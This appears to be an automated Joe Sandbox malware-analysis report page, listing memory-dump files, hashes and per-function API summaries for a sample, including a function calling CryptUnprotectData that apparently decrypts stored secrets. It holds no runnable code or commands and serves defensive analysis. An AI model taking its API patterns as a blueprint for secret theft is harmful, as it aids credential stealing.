Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 6\~$?Km$m7}=$xhGQ$2{z
API String ID: 0-4108839896
Opcode ID: b4302fd0d36c7d2737e028a0088aca68a8e50606ba083642e809759ba2c8ac37
Instruction ID: 93388ccfb77b613beac611120296bc147a862146c243eeeb2011349ba051a441
Opcode Fuzzy Hash: b4302fd0d36c7d2737e028a0088aca68a8e50606ba083642e809759ba2c8ac37
Instruction Fuzzy Hash: 6AA2F2F3A082009FE3046E2DEC8567AFBE5EF94720F1A4A3DE6C4C7744EA7558418697

Function 00897240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0089724D
RtlAllocateHeap.NTDLL(00000000), ref: 00897254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00897281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008972A4
LocalFree.KERNEL32(?), ref: 008972AE

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 1f99376b2fa2b7489d0c93eead191f49fe50ef9e6b19ae0078e3d7d9a8ede5a1
Instruction ID: 6ea34534e5acc3714c5a4d762680915a78f31059d61f3a8095eacc5b6dda6c45
Opcode Fuzzy Hash: 1f99376b2fa2b7489d0c93eead191f49fe50ef9e6b19ae0078e3d7d9a8ede5a1
Instruction Fuzzy Hash: 7101E9B5A41208BBEB10DFD4CD4AF9E77B8EB44B04F104155FB06EA2C0D6B0AA019BA5

Function 008A8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00895184,40000001,00000000,00000000,?,00895184), ref: 008A8EC0

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 2a757c3e507b060174263b2aa76c567da4e7184c5754e83312d61759ad03fd10
Instruction ID: 21e199c59b48a9c6383a2f522b7d7fc194b6a2641d57055a53d8070111d74c1f
Opcode Fuzzy Hash: 2a757c3e507b060174263b2aa76c567da4e7184c5754e83312d61759ad03fd10
Instruction Fuzzy Hash: F611F570200209EFEB00CFA4E884FAA37A9FF8A704F109448F919CB650DB75E851DB60

Function 00899AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00894EEE,00000000,?), ref: 00899B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899B2A
LocalFree.KERNEL32(?,?,?,?,00894EEE,00000000,?), ref: 00899B3F

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: e79719a14802fbaf05b0e6718ec4ab3cc93b4baa16803fdea4944c65aedd0235
Instruction ID: 53f3d3fce5bfd8591704f0e04e7bc0e5dc9d097349d2b30173017d9943953a5e
Opcode Fuzzy Hash: e79719a14802fbaf05b0e6718ec4ab3cc93b4baa16803fdea4944c65aedd0235
Instruction Fuzzy Hash: 8311A2B4241208AFEB10CFA4DC95FAA77B5FB89710F208059FD159B390C7B6A901DB90

Function 008A7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008B0E00,00000000,?), ref: 008A79B0
RtlAllocateHeap.NTDLL(00000000), ref: 008A79B7
GetLocalTime.KERNEL32(?,?,?,?,?,008B0E00,00000000,?), ref: 008A79C4
wsprintfA.USER32 ref: 008A79F3

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: fe08c30ea8d43a89a073651e3e206f5df9f2aea731d5f0da41a5923589ec0605
Instruction ID: 9b488e79f49204a8c920bdbc632dc73264a91c41307a74a3f0f3ff5a64858c8c
Opcode Fuzzy Hash: fe08c30ea8d43a89a073651e3e206f5df9f2aea731d5f0da41a5923589ec0605
Instruction Fuzzy Hash: 8B1127B2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AFA06A2280E3395941DBB1

Function 6C696CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C696D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696E1E

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction ID: cef72b3a95c0d67210e09b72d9d8342b2118f061bfe39851605f90312853d60d
Opcode Fuzzy Hash: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction Fuzzy Hash: 2BA17E706183818FC755CF25C490BAEFBE2BF89308F44495DE48A87751DB70E949CB96

Function 008A3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(008AE118,00000000,00000001,008AE108,00000000), ref: 008A3758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008A37B0

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: b3993a9a8c90fbf6a27dc35e6e50fb9bb8ec369444e619c6f3f3df5be9fcfc43
Instruction ID: 74f954d73cb020a04c1b3b5e9b03005d4b17b47d668c1eb7d005ee289fb7c571
Opcode Fuzzy Hash: b3993a9a8c90fbf6a27dc35e6e50fb9bb8ec369444e619c6f3f3df5be9fcfc43
Instruction Fuzzy Hash: 1641F770A00A289FEB24DB58CC95B9BB7B4FB49702F4041D8F619E7290E7716E85CF50

Function 00C6183F Relevance: 3.8, Strings: 2, Instructions: 1292COMMON

Download Yara Rule

Strings

-L 0, xrefs: 00C622DF
?)^q, xrefs: 00C62295

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: -L 0$?)^q
API String ID: 0-2297279973
Opcode ID: fc76b4b4296572d78b5064e93a19c33d075d7337d3545e685306c247081b123b
Instruction ID: 8db5d9ba6d372fcf6bbf1b1b3333f73cf9466c5800f0021f85cac188b8ade6c9
Opcode Fuzzy Hash: fc76b4b4296572d78b5064e93a19c33d075d7337d3545e685306c247081b123b
Instruction Fuzzy Hash: 228249F3A082049FD3146E2DEC8576AFBE9EF94320F1A463DEAC4C7744EA3558048697

Function 6C6B85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6B8C7C
__aulldiv.LIBCMT ref: 6C6B8DD7

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 814de8cf06003e87ebb2477e944c0d94209f8b6e29ef4fbe5db3ef8435c7af2b
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: D5328F71F0011A8BDF18CE9CC8A17AEB7B2FB8C304F15853AD506BB7A0DA349D558B95

Function 00C5CF6C Relevance: 3.3, Strings: 2, Instructions: 822COMMON

Download Yara Rule

Strings

FO, xrefs: 00C5D406
b0o, xrefs: 00C5D232

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
